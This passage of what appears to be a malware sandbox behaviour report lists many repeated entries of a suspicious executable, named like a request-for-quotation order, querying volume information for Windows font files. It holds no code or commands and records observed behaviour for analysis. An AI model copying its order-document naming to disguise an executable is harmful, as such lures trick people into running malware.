Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
